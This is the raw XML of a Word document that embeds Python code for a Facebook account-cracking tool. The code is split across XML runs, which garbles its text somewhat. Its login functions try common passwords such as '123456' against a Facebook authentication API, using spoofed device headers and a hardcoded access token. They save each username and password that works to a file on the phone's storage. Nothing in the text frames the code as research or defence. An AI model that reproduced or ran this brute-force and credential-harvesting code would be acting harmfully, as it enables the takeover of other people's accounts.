        <w:t>‎                print(f”\r\r\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m(\x1b[1;37mAHB\x1b[38;5;196m) \x1b[1;97m= \x1b[38;5;46m{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} \x1b[1;97m= \x1b[38;5;46m{pw} \x1b[1;97m= \x1b[38;5;45m{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>creationyear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CDEAD0" w14:textId="1C02F2C9" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                open(‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sdcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/AHB-OLD-M1-OK.txt’, ‘a’).write(f”{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}|{pw}\n”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB604B3" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oks.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADF50BF" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742983AE" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        loop += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AD914F" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    except Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC8181" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF10ACD" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76384B9D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9AA83" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> login_2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CF53C2" w14:textId="4F8F0019" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD1017" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Login attempt method 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEF41A8" w14:textId="51178C21" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB6BB3F" w14:textId="34F5F70E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    sys.stdout.write(f”\r\r\x1b[1;37m\x1b[38;5;196m+\x1b[1;37m\x1b[38;5;196m(\x1b[1;37mAHB-M2\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m(\x1b[38;5;192m{loop}\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m(\x1b[1;37mOK\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m(\x1b[38;5;192m{len(oks)}\x1b[38;5;196m)”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A4B68" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436BC7CC" w14:textId="2871C0F5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    for pw in (‘123456’, ‘123123’, ‘1234567’, ‘12345678’, ‘123456789’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCAFFC" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655805F9" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎            with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requests.Session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() as session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA20D5" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA837D" w14:textId="40D835E2" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                    ‘x-fb-connection-bandwidth’: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(20000000, 29999999)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719332D7" w14:textId="303D5DE5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    ‘x-fb-sim-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(20000, 40000)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712598B" w14:textId="57D43A06" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    ‘x-fb-net-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(20000, 40000)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5601F180" w14:textId="6EF1C36E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    ‘x-fb-connection-quality’: ‘EXCELLENT’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239AAAB2" w14:textId="03E67FEC" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    ‘x-fb-connection-type’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cell.CTRadioAccessTechnologyHSDPA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F93376A" w14:textId="52750F66" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    ‘user-agent’: window1(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1EC05" w14:textId="6794100E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    ‘content-type’: ‘application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23886817" w14:textId="0FEC07B3" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    ‘x-fb-http-engine’: ‘Liger’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430DFFE4" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1E96E3" w14:textId="478176BC" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = f”https://b-api.facebook.com/method/auth.login?format=json&amp;email={str(uid)}&amp;password={str(pw)}&amp;credentials_type=device_based_login_password&amp;generate_session_cookies=1&amp;error_detail_type=button_with_disabled&amp;source=device_based_login&amp;meta_inf_fbmeta=%20¤tly_logged_in_userid=0&amp;method=GET&amp;locale=en_US&amp;client_country_code=US&amp;fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&amp;access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&amp;fb_api_req_friendly_name=authenticate&amp;cpl=true”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F39C3" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>po</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, headers=headers).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A7C9A1" w14:textId="7C890360" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                if ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>po</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EEEC85" w14:textId="34CF2B2A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    print(f”\r\r\x1b[1;37m\x1b[38;5;196m\x1b[1;37m&lt;\x1b[38;5;196m(\x1b[1;37mAHB\x1b[38;5;196m) \x1b[1;97m= \x1b[38;5;46m{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} \x1b[1;97m= \x1b[38;5;46m{pw} \x1b[1;97m= \x1b[38;5;45m{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>creationyear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF48BA7" w14:textId="67987D8A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    open(‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sdcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/AHB-OLD-M2-OK.txt’, ‘a’).write(f”{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}|{pw}\n”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E3746" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oks.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB3558" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA64A8" w14:textId="3A4CE5DD" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>po</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F46C40" w14:textId="1365BAAF" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    print(f”\r\r\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m(\x1b[1;37mAHB\x1b[38;5;196m) \x1b[1;97m= \x1b[38;5;46m{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} \x1b[1;97m= \x1b[38;5;46m{pw} \x1b[1;97m= \x1b[38;5;45m{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>creationyear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E9D0AD" w14:textId="1F30FC2E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    open(‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sdcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/AHB-OLD-M2-OK.txt’, ‘a’).write(f”{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}|{pw}\n”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F77F9A" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oks.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE6E912" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488453D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4FC91" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA247C" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    loop += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8692C6" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B974B8" w14:textId="2D22E204" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎if __name__ == ‘__main__’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BF98EC" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    BNG_71_()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2EE2C9" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6"/>
    <w:sectPr w:rsidR="0090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C6"/>
    <w:rsid w:val="00906AC6"/>
    <w:rsid w:val="00FF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D9BC7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4CB84372-92E2-5A4C-89AD-E43E6319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6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facebook.com/BaLoch0654" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/@AliRafique2962-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3373</Words>
  <Characters>19231</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>160</Lines>
  <Paragraphs>45</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22559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SHAHZADA</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>UMAIR SHAHZADA</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-25T07:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-25T07:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>